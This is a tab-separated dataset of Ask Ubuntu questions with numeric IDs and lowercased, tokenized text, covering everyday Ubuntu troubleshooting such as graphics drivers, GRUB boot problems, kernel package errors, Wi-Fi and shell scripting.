264848	lock computers abilities	i need to have a computer which allows users to access one website ( login and buy meals ) . it should be secured so that they ca n't do anything other or access other websited . does anyone know any good tools for that ?
264852	skype off when write in chat and open the call video in the same time	i do n't understand why when i open a video call and write in the same time , skype turns off and back again for open it . i tried again and found the same problem : skype does n't let me write while i 'm in a video call ... please need help i use it for my study . i use skype for ( ubuntu 12.04 multiraich )
264863	how to unfreeze x	i 'm having a bit of instability lately , and while i 've given up on fixing it ( i thought i 'd broken something irreparably in quantal so i wound up upgrading to raring for lack of any better ideas , so i have to live with a little bit of instability for now ) , it occasionally ( once a week , often when i 'm on a skype call ) happens that x stops refreshing , but all process continue to run properly in the background ( music will keep playing until it reaches the end of a file , skype continues to work , ssh processes keep going ) . is there any way for me to get x to start responding again at times like this ? normally i 'd just let everything run out as best i can and then hard reboot , but i 'm wondering if there 's any way i can save it . ctrl+alt+f1 does n't seem to have any useful effect -- it gets rid of x on one display , but i never get an interactive shell back . thanks !
264864	ubuntu 12.10 audio out-of-sync in all programs	yesterday i noticed that the sound system in my ubuntu was delayed in all applications ( vlc , flash , totem etc ) . this certainly was n't happening a couple of weeks ago , and probably is n't a hardware problem ( in my windows partition the sound sync is just fine ) . the other questions on stackoverflow are either too old or just specific to certain programs . that 's not my case . i have tried this already . what can i do to fix it ? or help you understand what 's wrong ?
264869	why can i not install ubuntu server edition on my server	i go to the completed download file but i can not find a setup.exe like windows and there is not a setup file in the folder . can anyone help me ?
264870	ldap and thin clients	i currently have a sun/oracle enterprise directory server setup . i want to if possible authenticate my thin lts clients to prevent the burden of local accounts and adhere to company policy . i have seen this document which outlines the procedure to authenticate ubuntu clients to an existing sun/oracle enterprise system directory server : - https : //help.ubuntu.com/community/sunldapclientauthentication i have yet to try , but is it possible to apply the procedure to a thin client ? my assumption is after reading the document is that iâd simply need to mount and chroot the thin client image and then follow the procedure . has anyone attempted this before ? thanks in advance , dan .
264871	how do i get nvidia drivers working on new 2012 imac ?	i ca n't get nvidia drivers working on my new imac . it has the geforce gtx 680mx card and i believe it 's currently using the nouveau drivers . whenever i install the nvidia drivers ( i 've tried downloading the proprietary ones from their site , installing nvidia-current , and nvidia-current-updates ) , it boots to a black screen . i can still get to tty by ctr+alt+f1 , but no desktop . i also do n't have unity 3d working at the moment either ... i 've looked through all the forum posts i could find but none worked and all seemed to be slightly different than my predicament . any help would be greatly appreciated ! output from /usr/lib/nux/unity_support_test -p : opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 0x301 ) opengl version string : 2.1 mesa 9.0 not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no output from lspci | grep vga : 01:00.0 vga compatible controller : nvidia corporation device 11a3 ( rev a1 ) output from lsmod : module size used by joydev 17694 0 hid_magicmouse 17939 0 hidp 22516 1 nouveau 924024 2 ttm 88495 1 nouveau drm_kms_helper 49259 1 nouveau drm 290344 4 nouveau , ttm , drm_kms_helper i2c_algo_bit 13565 1 nouveau mxm_wmi 13022 1 nouveau wmi 19257 2 nouveau , mxm_wmi vesafb 13846 0 btusb 22432 0 snd_hda_codec_hdmi 32476 1 lib80211_crypt_tkip 17391 0 coretemp 13642 0 kvm_intel 137888 0 kvm 422160 1 kvm_intel ghash_clmulni_intel 13221 0 aesni_intel 51134 0 cryptd 20531 2 ghash_clmulni_intel , aesni_intel aes_x86_64 17256 1 aesni_intel hid_generic 12541 0 hid_apple 13376 0 applesmc 19515 0 input_polldev 13897 1 applesmc snd_hda_codec_cirrus 24052 1 microcode 23030 0 lpc_ich 17145 0 parport_pc 32867 0 wl 3074942 0 rfcomm 47562 12 cfg80211 208382 1 wl lib80211 14382 2 lib80211_crypt_tkip , wl bnep 18240 2 bluetooth 211812 29 hidp , btusb , rfcomm , bnep snd_seq_midi 13325 0 snd_rawmidi 30750 1 snd_seq_midi ppdev 17114 0 snd_seq_midi_event 14900 1 snd_seq_midi uvcvideo 78117 0 videobuf2_core 33025 1 uvcvideo videodev 125126 2 uvcvideo , videobuf2_core videobuf2_vmalloc 12861 1 uvcvideo videobuf2_memops 13405 1 videobuf2_vmalloc usbhid 47259 0 hid 100815 5 hid_magicmouse , hidp , hid_generic , hid_apple , usbhid snd_seq 61931 2 snd_seq_midi , snd_seq_midi_event snd_seq_device 14498 3 snd_seq_midi , snd_rawmidi , snd_seq snd_hda_intel 34117 5 snd_hda_codec 135141 3 snd_hda_codec_hdmi , snd_hda_codec_cirrus , snd_hda_intel snd_hwdep 17765 1 snd_hda_codec video 19653 1 nouveau snd_pcm 97523 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec mac_hid 13254 0 snd_timer 29990 2 snd_seq , snd_pcm mei 41410 0 snd 83674 20 snd_hda_codec_hdmi , snd_hda_codec_cirrus , snd_rawmidi , snd_seq , snd_seq_device , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_timer apple_bl 13674 0 soundcore 15092 1 snd snd_page_alloc 18573 2 snd_hda_intel , snd_pcm lp 17800 0 parport 46563 3 parport_pc , ppdev , lp sdhci_pci 18749 0 sdhci 33145 1 sdhci_pci
264873	how do i re-install windows 7 after doing a full install of ubuntu 12.04 ?	although i have enjoyed ubuntu , my partner and i share a computer and they would like windows 7 back . the problem is that i did a full install of ubuntu 12.04 , and have no idea how to get windows 7 back on and i really do n't want to mess up the computer . i would need to boot from a usb .
264874	/bin/bash : -- pkg : command not found	i am attempting to build a package using jhbuild but am running into an error during the build phase . the output for this phase is : *** building egg-list-box *** [ 1/1 ] make -j 8 make all-am make [ 1 ] : entering directory `/home/notgary/devel/git.gnome.org/egg-list-box' cc test-sel.o cc test-flow-box.o valac test_list_vala.stamp /bin/bash : -- pkg : command not found valac test_scrolled_vala.stamp /bin/bash : -- pkg : command not found make [ 1 ] : *** [ test_list_vala.stamp ] error 127 make [ 1 ] : *** waiting for unfinished jobs ... . make [ 1 ] : *** [ test_scrolled_vala.stamp ] error 127 make [ 1 ] : leaving directory `/home/notgary/devel/git.gnome.org/egg-list-box' make : *** [ all ] error 2 *** error during phase build of egg-list-box : # # # # # # # # # # error running make -j 8 *** [ 1/1 ] the specific error message is /bin/bash : -- pkg : command not found i 'm pretty sure it 's because i am missing the right package , but i do n't know what one i should be installing . every time i try to search the package directory for pkg i always end up with hist for dpkg .
264876	webcam on lenovo u310 has no video	i 've bought a lenovo u310 , installed ubuntu 12.10 and wanted to use the internal webcam with skype and google hangout . but i can not get any video signal out of it . other apps like cheese can . audio or an external webcam work fine . any idea on how to fix that ?
264882	my cpus are powered down periodically	i post here because i am using ubuntu but this is probably an hardware problem . since i bought my new setup with amd athlon ( tm ) ii x4 635 processor and asus m4a89td pro/usb3 motherboard with ecc ram i have stuttering on videos . i was using ubuntu 11.10 now ubuntu 12.10 . looking at syslog i have found that periodically ( i notice only on videos but it happens always ) this thing happens : mar 6 23:36:42 virtual1 kernel : [ 28564.375548 ] smpboot : cpu 1 is now offline mar 6 23:36:42 virtual1 kernel : [ 28564.380751 ] smpboot : cpu 2 is now offline mar 6 23:36:42 virtual1 kernel : [ 28564.394947 ] smpboot : cpu 3 is now offline mar 6 23:36:48 virtual1 kernel : [ 28569.917021 ] smpboot : booting node 0 processor 1 apic 0x1 mar 6 23:36:48 virtual1 kernel : [ 28569.928015 ] lvt offset 0 assigned for vector 0xf9 mar 6 23:36:48 virtual1 kernel : [ 28569.928372 ] [ firmware bug ] : cpu 1 , try to use apic500 ( lvt offset 0 ) for vector 0x400 , but the register is already in use for vector 0xf9 on another cpu mar 6 23:36:48 virtual1 kernel : [ 28569.928378 ] perf : ibs apic setup failed on cpu # 1 mar 6 23:36:48 virtual1 kernel : [ 28569.931305 ] process : switch to broadcast mode on cpu1 mar 6 23:36:48 virtual1 kernel : [ 28569.934255 ] smpboot : booting node 0 processor 2 apic 0x2 mar 6 23:36:48 virtual1 kernel : [ 28569.945554 ] [ firmware bug ] : cpu 2 , try to use apic500 ( lvt offset 0 ) for vector 0x400 , but the register is already in use for vector 0xf9 on another cpu mar 6 23:36:48 virtual1 kernel : [ 28569.945558 ] perf : ibs apic setup failed on cpu # 2 mar 6 23:36:48 virtual1 kernel : [ 28569.948124 ] process : switch to broadcast mode on cpu2 mar 6 23:36:48 virtual1 kernel : [ 28569.949644 ] smpboot : booting node 0 processor 3 apic 0x3 mar 6 23:36:48 virtual1 kernel : [ 28569.960838 ] [ firmware bug ] : cpu 3 , try to use apic500 ( lvt offset 0 ) for vector 0x400 , but the register is already in use for vector 0xf9 on another cpu mar 6 23:36:48 virtual1 kernel : [ 28569.960840 ] perf : ibs apic setup failed on cpu # 3 mar 6 23:36:48 virtual1 kernel : [ 28569.962953 ] process : switch to broadcast mode on cpu3 i have : updated bios ; tried all ( really ) bios options ; changed ram ; changed psu and cpu cooler ; tried 3.8.1 kernel . what can i do now ? please help me ! thanks , mario
264887	why ca n't i boot into ubuntu installed alongside windows 8 ?	once i reboot it after the installation , it brings me to a screen to choose windows 8 or ubuntu . when i click ubuntu it brings me to a screen with this options : reinstall windows change the language or repair and then it brings me back to the grub , and then if i pick ubuntu it does it again .
264888	how to move an exe file to wine 's fake c : drive	can anyone tell me how i can move a .exe file to wine 's fake c : drive ? thanks !
264890	ubuntu install from iso always kicks back to `` ubuntu installer main menu ''	i 'm trying to install ubuntu server from iso , on a system that does n't have networking connectivity to the internet , but i 'm not able to get past a certain point . initially , the process proceeds normally , it seems to partition things correctly and installs the base system . however , when i get to the `` configure the package manager '' stage in the `` ubuntu installer main menu '' , and i hit `` enter '' , i see a dialog that says `` configuring apt '' with a progress bar , and then it goes right back to the `` ubuntu installer menu '' . the same thing happens no matter what other option i select ( e.g. , install the grub boot loader on a hard disk , finish the installation , abort the installation ) : a dialog that says `` configuring apt '' with a progress bar appears , and then it kicks back to the installer menu . i 'm at a loss to how to troubleshoot this , since i do n't see any error message during this process . i 've tried both ubuntu server 12.04 and ubuntu server 12.10 , same result .
264892	cuda and driver : can i remove driver or change resolution ?	i have just installed cuda . all 3 parts ( samples , toolkit , driver ) . do i have to have this nvidia driver installed ? $ lspci | grep vga 01:00.0 vga compatible controller : nvidia corporation gk107 [ geforce gt 630 ] ( rev a1 ) it has been installed but neauveau has been uninstalled and on my ubuntu 12.10 only neauveau gives nice resolution . or other option : haw to change resolution with this driver ? in settings- > display there are only 2 options : 1024 or 800 but i 'd like higher
264894	graphics driver ruined ubuntu 12.10 ?	i installed a driver for the ati raedon hd 4000 series , but upon reboot , i found that resolution is considerably smaller , and the launcher and menu bar were gone . i had a few desktop shortcuts , but trying to launch them did nothing . please help !
264900	ca n't install ubuntu onto brand new hard drive	i recently replaced the hard drive of my samsung n102 netbook with a brand new hard drive . i ca n't get the computer to read the ubuntu 12.10 install disc at all . it says `` os not found '' despite me having changed the bios boot order to read the cd/dvd reader i 've connected by usb first . what should i do do you think ? any help would be much appreciated .
264908	amd video cards : force full-screen game to one monitor ?	i have a amd radeon 7850 and a dual-montior setup , configured in the amd catalyst control center ( amdcccle ) . my monitors are configured to act as a single screen ( 3360x1050 ) . however , when i launch a game in full screen mode , the game is centered between the two monitors . how i can i force it to a single monitor ? this question is almost identical to the question : force full-screen game to one monitor ? , but i 'm looking for a solution for amd/ati cards .
264910	how to make man pages ?	i know how to make commands ( scripts ) in linux . i would like to know if i could make man pages for the commands ?
264911	i have a problem installing activestate python instead of the default . how can i fix it ? syntax error : `` ) '' unexpected	i am getting this error when trying to run the ./install.sh for activepython . how can i correct this ? cd /tmp wget http : //downloads.activestate.com/activepython/releases/2.7.2.5/activepython-2.7.2.5-linux-x86_64.tar.gz tar xzf activepython-2.7.2.5-linux-x86.tar.gz cd activepython-2.7.2.5-linux-x86 ./install.sh error : ./installdir/bin/python2.7 : 2 : syntax error : `` ) '' unexpected
264913	package system broke . memory full with inodes	i had the problem with package system broken and realized that it is because of the higher inode files , which filled the /usr up to 100 % . please suggest a good and safe way to solve this problem .
264917	how to ensure ubuntu is using all my cores	i have a 6 core processor and have noticed some performance issues . i recognize coming from windows things wo n't be the same . but i 've heard that it 's not incredibly uncommon for linux to not utilize all cores available . is there a command or series of commands to be sure linux recognizes my processor runs all 6 cores ?
264918	ubuntu 12.10 installer ca n't detect hard drives	i 'm hoping someone here could help me with the installation problem i 'm having , namely ubuntu does n't detect my hard drives . i 've tried installing from a disc and using wubi ; neither have worked . drives are detected just fine in windows 7 . i searched around to see if any of my hardware is incompatible , but did n't find anything . here 's a list just in case i missed something : mobo : asrock h61m/u3s3 lga 1155 intel h61 sata ram : g.skill sniper 8gb ( 2 x 4 ) 240 pin ddr3 gpu : geforce gtx 560 ti cpu : intel i5-2400 3.1 ghz quad-core hdd : western digital wd blue wd50000aakx 500gb sata ssd : intel ssdsc2cw120a 128gb nothing shows up in gparted or disk utility when i run the live cd . i ran the boot info script , the results of which are : boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== ============================ drive/partition info : ============================= no valid partition table found '' blkid '' output : __________________________________________________ ______________ device uuid type label /dev/loop0 squashfs /dev/sr0 iso9660 ubuntu 12.10 amd64 ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sr0 /cdrom iso9660 ( ro , noatime ) ========= devices which do n't seem to have a corresponding hard drive : ========= no block devices found =============================== stderr messages : =============================== no volume groups found does anyone have any ideas as to what the problem could be ? no one over at ubuntuforums had any ideas . thanks !
264919	how to get emu 1212m , emu 1616m , or emu 1010 to work with ubuntu ?	all of these models actually use the same exact pcie card . i happen to have the 1212m model . it worked great in windows , but unfortunately , creative labs e-mu only offers windows drivers for this particular card . i have switched to using ubuntu as my main desktop for a while now . how can i make it work in ubuntu ? furthermore , my chipset comes with integrated intel hd audio as well , and i 'd like to be able to switch back and fourth between the e-mu sound card and the intel one .
264931	my ubuntu partition was deleted and i ca n't boot from either a dvd or usb	it 's my first time installing ubuntu . i have windows 7 and 8 before in my laptop ( acer aspire 4752z ) . after ubuntu ( 12.04 ) installed in my laptop , the windows boot loader did n't recognize my ubuntu so i updated grub from a live usb . and after grub updated , ubuntu was booting perfectly but my windows was n't listed in the grub menu . so i follow someone instruction to update grub again . and after reboot , the grub menu did n't show anymore . after searching about this problem on the net and trying to update grub again and again , i decided to delete the ubuntu partition from live usb . and shortly after , i booted to windows with hiren boot and i used mbrfix . but i think it failed . now i cant show my bios setup or boot from dvd or usb . after that , the only screen i can see after booting is : error : unknown filesystem grub rescue >
264932	ubuntu server does not appear on network by netbios name until 2nd reboot ?	currently having a strange issue whereby my ubuntu lts 10.04 server does not appear on the network on first boot after being shut down . i am able to connect to the server using the assigned ip , but not via the netbios name . i am using sudo shutdown -h now to perform a safe shutdown and power off the system . currently , i have tried to troubleshoot the problem by restarting the samba service and restarting networking but neither of these attempts allow the server to be seen on the network . the only thing that seems to fix the problem is if i restart the server after it boots successfully for the first time . any help would be appreciated . i 'm at a total loss here .
264934	how do i undo an accidental installation of all perl modules ?	i was attempting to upgrade my perl modules through cpan , but i did not supply a regex/module name to upgrade : perl -mcpan -e 'upgrade ' ; i can only assume the worst ( which seems to be supported by the output of perldoc perllocal ) , i.e . all perl modules from cpan are installing . how can i undo this mess ? i suppose i can remove /usr/local/share/perl , but what are the implications of that ? edit : i still have 95 % free space on my hard drive , so it 's not a huge concern . i just do n't want lots of unnecessary clutter . i 'm considering rm'ing that directory , doing dpkg -- purge perl and redoing the apt-get and cpan install process . but is it really necessary , or can i just remove the unnecessary modules from /usr/local/share/perl ?
264935	how do i disable bootchart ?	i dont want a bootchart to be generated on every startup . how do i disable bootchart ? once disabled , how do i re-enable bootchart ? i do n't mean uninstall .
264939	installation under vmware gets into installation loop	i 'm instlling ubuntu 12.04 lts on vmware servers . i use preseed to automate the installation . the problem i have is that once the cd-rom image is attached to the virtual machine , and the bios is configured to pick it first , the machine will always reboot from the cd-rom even after the previous installation succeeded . i tried to run `` eject '' as a preseed/late_command like this : d-i preseed/late_command string in-target /media/cdrom/preseed/postinstall.sh ; eject i 'm doing it from the late_command line in hope that doing so will mean that the cd-rom is not kept busy by the postinstall.sh script . but this fails with `` illegal ioctl '' and `` i/o error '' ( found this by re-trying the eject from a secondary virtual console after the failure ) . the cd-rom is not mounted at this point but still the machine will reboot from the cd-rom in the next reboot . i also tried to set : d-i cdrom-detect/eject boolean true but this does n't change anything either . is there an automatic way to tell vmware to behave as if the cd-rom was ejected for the next reboot ? right now i 'm forced to wait for the reboot and detach the cd-rom manually at the right moment .
264941	part of an old window remains after program closes	after i close a program , part of the window remains open . the affected part of the screen remains as it was when the window was open , and it stays on top of other windows . it 's not a redraw issue per se -- xrefresh does n't help since it repaints the bad window . this phantom window does not appear in the 'task bar ' or alt+tab switcher , but it 's not just a screen artifact either . when i run my mouse over it the cursor changes , so it 's still being treated in some ways like a window ( though it ca n't be selected or changed and it does n't have a full titlebar ) . any ideas how i can change this ? this problem happens , unfortunately , with some regularity to me , maybe every other week . as i leave my computer on for extended periods to do extended calculations this is more than a small inconvenience , since it blocks part of the display for several weeks until the work is complete and i can restart .
264945	ca n't change ethernet card 's ip address	i have ubuntu 12.10 desktop version installed on hp 4000 pc , when i try to set up static ip address for nic by using network from menu bar , and switch from dhcp to manual , i can add static ip , default gateway and network mask . however the save button has been grayed out . so i ca n't set up static ip address for the nic . can anybody give me some explanations ? thanks for your help .
264949	grant command syntax error near password in shell script	i am stuck with an issue with shell scripting . i have already used \ character before double quotes ( `` ) because of some reason , as in the following line of my shell script . sql2=\ '' grant all on \ $ { db_name } . * to \ $ { db_user } @ \ $ { host } identified by \ $ { db_pass } ; \ '' ; but as in the mysql `` grant '' command syntax , i need to put double quotes before and after \ $ { dbpass } , which is the part of the shell script line i given above.when i put like this , \ '' \ $ { dbpass } \ '' , it is throwing syntax error during execution.what should i need to solve this . this is the shell script which i want to run . ssh -t qbadmin @ 10.3.2.0 ' su root -c `` echo \ '' give db name : \ '' ; read db_name ; echo \ '' give password : \ '' ; read db_pass ; host=localhost ; sql1=\ '' create database \ $ db_name ; \ '' ; sql2=\ '' grant all on \ $ { db_name } . * to \ $ { db_name } @ \ $ { host } identified by \ '' \ $ { db_pass } \ '' ; \ '' ; sql3=\ '' \ $ { sql1 } \ $ { sql2 } \ '' ; echo \ '' ==============\ '' ; mysql -u root -p -e \ '' \ $ { sql3 } \ '' ; `` ; ' please refer this script and please let me know the necessary changes i need to do with this . thanks .
264951	how to bridge local ( ethernet ) ipphone to lan connected by wifi ?	i 've got a wifi network providing local services such as pbx , cifs , etc . it is useful then you do not have ability ( or wish ) to entangle you room with wires ... i 'd like to connect some ( 4 exactly ) wired ip phones to local pbx using mono-blocks with wifi and ethernet interfaces . of course , i can think of wifi i phones and , probably , will do so , if i could not get it work . straightforward approach to get it done did n't help a bit with something like `` ca n't add wlan0 to bridge br0 : operation not supported '' . some kind of nats or routing setup is not an option ( because of complexity ) also , though it is possible . do i have any cheats or hacks left to fulfill this ... quest ? : - ) ... ah , yes : it 's cisco ip phone 301 here and ubuntu 12.04 box with wifi and ethernet hoping to reach wifi connected asterisknow . thanks in advance for any suggestions !
264955	voip solution for ubuntu family	my question is : i need a voip solution to install on my xubuntu 12.10 machine ( or maybe ubuntu ) and preferably with a detailed how-to configure it with images ! wich one do you advise-me ? ( please notice that i need a reliable software ) ps : please , no skype here ! just free and open source software . thanks !
264956	samsung backlight	i have a samsung series 7 chronos ( 700z5c-s02ub ) and a couple of kernel updates ago ( i 'm currently on 3.5.0-25-generic ) , i lost the keyboard backlight support . any idea on how to turn it back on ? note : i 've already had samsung-tools , i 've re-installed but still does n't work edit : i manage to get it working ( somehow ) . what i found is : the ambient light autodetect works , but it seems to be unable to control the level of brightness . if i boot windows and set it to high , it works in ubuntu ( it might be just a coincidence tho )
264964	a good lan messaging and file-sharing application	presently i use iptux for sending messages and sharing files over my hostel lan , but the interface is n't quite convenient and the files sent/received do n't reach the destination completely a lot of times . is there a better lan messaging and file-sharing application on ubuntu ? i do n't intend to use samba as i need to send messages too .
264966	is there a way to set variables resolving to path in terminal e.g : ~ is for /home/ < username >	just to clarify : i know we can set environment variables with export command like export java_home=/usr/lib/jvm/.. for environment variables , we need to use ' $ ' sign in starting and we can not explore the path further using 'tab ' key . i am just wondering that as ~ is set to path /home/ < username > , is there a way to set variables to path in the same pattern where we can also use 'tab ' key to further explore the path ?
264971	i lost my admin password and i need to find out what it is	i 've tried to type something that is my most favorite stuff or what names i could have put . i need to learn how to hack into my admin account or just reset the password some how .
264973	rebinding super key shortcut in ubuntu 12.10	in ubuntu 12.10 , super key is binded to dash home and to show all open windows i have to press super + w. how can i change the shortcuts ( i want to show all open windows by only pressing super ) ? in the ubuntu keyboard settings there is no such binding .
264974	combining hard drives	ok so i have 3 hard drives in my machine , 1 that has ubuntu 12.04 installed on it , one with windows 7 and the last one has unallocated space . the windows 7 drive is almost full and i was wondering how can i extend my win7 drive using ubuntu ? so that i have 2 drives using windows 7 and 1 drive using ubuntu .
264982	connection refused when i 'm transfering data from dell laptop to lenovo laptop	i do n't have a external hard disk because of that i 'm trying to transfer data from dell laptop to lenovo through scp , and its showing : ssh : connect to host 169.144.38.162 port 1807 : connection refused and for the next time its showing : ssh : connect to host 169.144.38.162 port 1807 : connection timed out , please help me to get out of this issue .
264984	how to download a file from gmplib.org ?	i am new to ubuntu and am trying to open a link in a website . the link can be opened in windows but not in ubuntu lucid . is there any restriction in ubuntu for opening a link that may have codes and packages to install ? this is the link of the site : http : //gmplib.org/ and i need to click on `` download benchmark sources '' . thanks . also asked here : http : //ubuntuforums.org/showthread.php ? t=2123075
264985	how to connect to wifi using realtek 8723e ?	i have a toshiba satellite with realtek 8723e 802.11n and running ubuntu 12.04 . i have installed the driver and all was well until this happened . it shows my network , but when i try to connect , it sort of keeps looping back to authenticate . i know my password is correct , and it is n't a problem with the network itself as it easily connects with other devices . is it a problem with the driver ? some times it just miraculously connects . i have tried digging the forums but to no avail . $ lshw -c network warning : you should run this program as super-user . *-network description : ethernet interface product : ar8162 fast ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 10 serial : 00:26:6c:28 : ae : c8 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx duplex=full firmware=alx ip=192.168.1.15 latency=0 multicast=yes port=twisted pair speed=100mbit/s resources : irq:42 memory:88500000-8853ffff ioport:3000 ( size=128 ) *-network description : wireless interface product : realtek semiconductor co. , ltd. vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 00 serial : 74 : e5:43 : bc:49 : a3 width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8723e driverversion=3.2.0-38-generic-pae firmware=n/a latency=0 multicast=yes wireless=ieee 802.11bgn resources : irq:17 ioport:2000 ( size=256 ) memory:88400000-88403fff warning : output may be incomplete or inaccurate , you should run this program as super- user .
264986	non-symmetric core load when playing a game	i play serious sam 3 on ubuntu 12.10 amd64 with amd phenom ii x4 955 processor . and all time i play it there was fully loaded only one core . command mpstat 1 1500 -p all after some time gives summary about idle-time percentage for each cpu : cpu0 = 12.86 % ; cpu1 = 77.04 % ; cpu2 = 85.36 % ; cpu3 = 82.47 % obviously , cpu0 was loaded more time . i repeat the test , and get nearly the same result cpu0 = 13.73 % ; cpu1 = 80.37 % ; cpu2 = 85.72 % ; cpu3 = 83.10 % any time i minimize game and look to cpu-load widget in kde i see that cpu0 fully loaded . is there a way to fix this ?
264987	why are fat partitions not automounted ?	i see this happen in ubuntu 12.04 . when i plug an sd card which contains boot and rootfs partitions , only the rootfs gets automounted but not the boot . the only difference between these two is that boot partition is fat32 type while rootfs is ext4 type . so i understand that ubuntu does not automount fat32 . but why is this so ?
264988	puppet master monitoring	i have installed puppetmaster in ubuntu 10 and i have installed puppet in all my clients . i have joined all my puppet clients with puppet master . tell me how to list all the running services of my client ( like nagios , apache , mysql etc ) in my puppet master console ? or simply how to monitor services running in client using master master console ? thanks in advance
264991	tried to install a kernel , now i have mutliple problems !	i tried to upgrade the kernal to 3.8.2 but it did n't work . so after learning that 3.8 would n't work with bumblebee i tried to go back and install 3.5.25 . it still did n't work . uname -r says : 3.5.0-17-generic so here are my problems : whenever i try to launch update manager i get this : e : linux-image-extra-3.5.0-25-generic : subprocess installed post-removal script returned error exit status 1 i tried to sudo rm the directories but it does n't help . $ sudo apt-get purge linux-image-extra-3.5.0-25-generic reading package lists ... done building dependency tree ... done reading state information ... done the following packages will be removed : linux-image-extra-3.5.0-25-generic 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . 2 not fully installed or removed . e : could not get lock /var/cache/apt/archives/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/cache/apt/archives/ $ sudo dkpg -- configure -a setting up linux-image-3.5.0-25-generic ( 3.5.0-25.39 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 3.5.0-25-generic /boot/vmlinuz-3.5.0-25-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.5.0-25-generic /boot/vmlinuz-3.5.0-25-generic update-initramfs : generating /boot/initrd.img-3.5.0-25-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 3.5.0-25-generic /boot/vmlinuz-3.5.0-25-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.5.0-25-generic /boot/vmlinuz-3.5.0-25-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.5.0-25-generic /boot/vmlinuz-3.5.0-25-generic /usr/sbin/grub-mkconfig : 36 : /etc/default/grub : i915.modeset=1 : not found run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 127 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.5.0-25-generic.postinst line 1010. dpkg : error processing linux-image-3.5.0-25-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : linux-image-3.5.0-25-generic
264993	a problem occured when checking for updates	i am using ubuntu 12.10 . i think my problem in downloading some applications are related to this problem . i ca n't download applications using terminal . this is what i get : a problem occurred when checking for the updates i already tried these : $ sudo aptitude update & & sudo aptitude safe-upgrade sudo : aptitude : command not found $ sudo rm /var/cache/apt/*.bin no such file or directory $ sudo apt-get update & & sudo apt-get upgrade e : type 'dev ' is not known on the line 1 in the source list /etc/apt/sources/list.d/google.list e : the list of sources could not be read i was actually trying to download a postresql . how do i resolve this ?
264995	what happens to the usb after burning ubuntu 12.04 ?	if my host is windows 7 and i want to try ubuntu using a bootable usb , will i be able to use the usb for just storage or would it be forever a bootable for ubuntu ?
264996	how do i log in to a specific gmail account in incognito mode using command line ?	how do i log in to a specific gmail account in incognito mode using command line ? , i want to put that on startup , thats why .
265004	question regarding upgrading to gcc 4.7	i have just updated to gcc-4.7 & g++4.7 : chan @ ubuntu : ~ $ sudo apt-get install gcc-4.7 reading package lists ... done building dependency tree reading state information ... done gcc-4.7 is already the newest version . the following packages were automatically installed and are no longer required : linux-headers-3.2.0-24 linux-headers-3.2.0-24-generic-pae use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . chan @ ubuntu : ~ $ sudo apt-get install g++-4.7 reading package lists ... done building dependency tree reading state information ... done g++-4.7 is already the newest version . the following packages were automatically installed and are no longer required : linux-headers-3.2.0-24 linux-headers-3.2.0-24-generic-pae use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . but when i run gcc -v it showed chan @ ubuntu : ~ $ g++ -v using built-in specs . collect_gcc=g++ collect_lto_wrapper=/usr/lib/gcc/i686-linux-gnu/4.6/lto-wrapper target : i686-linux-gnu configured with : ../src/configure -v -- with-pkgversion='ubuntu/linaro 4.6.3-1ubuntu5 ' -- with-bugurl=file : ///usr/share/doc/gcc-4.6/readme.bugs -- enable-languages=c , c++ , fortran , objc , obj-c++ -- prefix=/usr -- program-suffix=-4.6 -- enable-shared -- enable-linker-build-id -- with-system-zlib -- libexecdir=/usr/lib -- without-included-gettext -- enable-threads=posix -- with-gxx-include-dir=/usr/include/c++/4.6 -- libdir=/usr/lib -- enable-nls -- with-sysroot=/ -- enable-clocale=gnu -- enable-libstdcxx-debug -- enable-libstdcxx-time=yes -- enable-gnu-unique-object -- enable-plugin -- enable-objc-gc -- enable-targets=all -- disable-werror -- with-arch-32=i686 -- with-tune=generic -- enable-checking=release -- build=i686-linux-gnu -- host=i686-linux-gnu -- target=i686-linux-gnu thread model : posix gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) how was this possible ? has anyone experienced this issue ? thanks .
265006	how can i monitor/control applications making network connections ?	i found out about nethogs and iftop the other day , and ran them . i was surprised to see some applications running daemons i did n't know about . it 's fine now that i know about them , but i 'd like to be more aware of this sort of thing in future , mainly to save bandwidth ! is there a single ubuntu application that : monitors which applications are making connections monitors where they 're connecting to would request my permission before making a connection ( less important ) monitors how much they 've uploaded/downloaded
